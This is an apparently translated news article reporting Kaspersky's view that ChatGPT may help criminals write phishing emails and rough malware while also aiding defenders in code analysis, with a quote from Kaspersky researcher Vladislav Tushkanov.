ChatGPT: Cybercriminals can use it as part of their scams

by time news

Kaspersky has analyzed how the expansion of ChatGPT, one of the most powerful Artificial Intelligence models to date, can change the established rules in the world of cybersecurity. ChatGPT-3 can explain complex scientific concepts better than many teachers, write music and almost any type of text the user likes.

ChatGPT-3 is an Artificial Intelligence system capable of generating texts that hardly differ from those produced by a person. For this reason, cybercriminals apply this technology to spear-phishing attacks, email scams, or communications directed at specific individuals, organizations, or companies. Writing personalized messages was until now a great effort for cybercriminals, but with ChatGPT this will no longer be the case: allows you to create persuasive, personalized and mass phishing emails. In this way, it is expected that successful attacks based on this Artificial Intelligence model will grow.

And if that was not enough, ChatGPT is also capable of generating malicious computer code. It is no longer necessary to have programming knowledge to create malware, but it is something that will not be a threat if you have reliable security systems, since this type of solution automatically detects programs created by bots and neutralizes them. Although some experts have expressed concern that ChatGPT can create malware specifically tailored for each person, the code will exhibit malicious behavior that will almost always be detected by security solutions. Full malware code automation has not been achieved at this time.

With all this, ChatGPT can be an ally for attackers, but also for those who want to defend themselves against this type of threat. Can quickly reveal the function for which a computer code has been created, something especially interesting in the SOCs, centers in which the experts have a heavy workload. Any tool that speeds up analysis processes is always welcome. In the future we will see reverse engineering systems that will help to better understand the code and create models of vulnerability investigation and CTF (Capture The Flag) resolution and much more.

“Although ChatGPT is not designed for criminal use, it can help cyber attackers, for example, to write credible and personalized phishing emails, although it is not capable of becoming a stand-alone hacking system. Furthermore, the malicious code it generates does not have to work correctly. A trained and dedicated human specialist is required if the code is to be improved. ChatGPT does not have an immediate impact on the industry and does not change the rules of cybersecurity, but the next generations of AI probably will. In the coming years, we will see how Artificial Intelligence models trained in both natural language and programming code will be adapted to specific cybersecurity cases. These changes can affect a wide range of industry activities, from threat hunting to incident response. Cybersecurity companies will explore the possibilities that these new tools will bring, while being aware of how this new technology can help cybercriminals.”says Vladislav Tushkanov, a security expert at Kaspersky.

More information

You may also like

Leave a Comment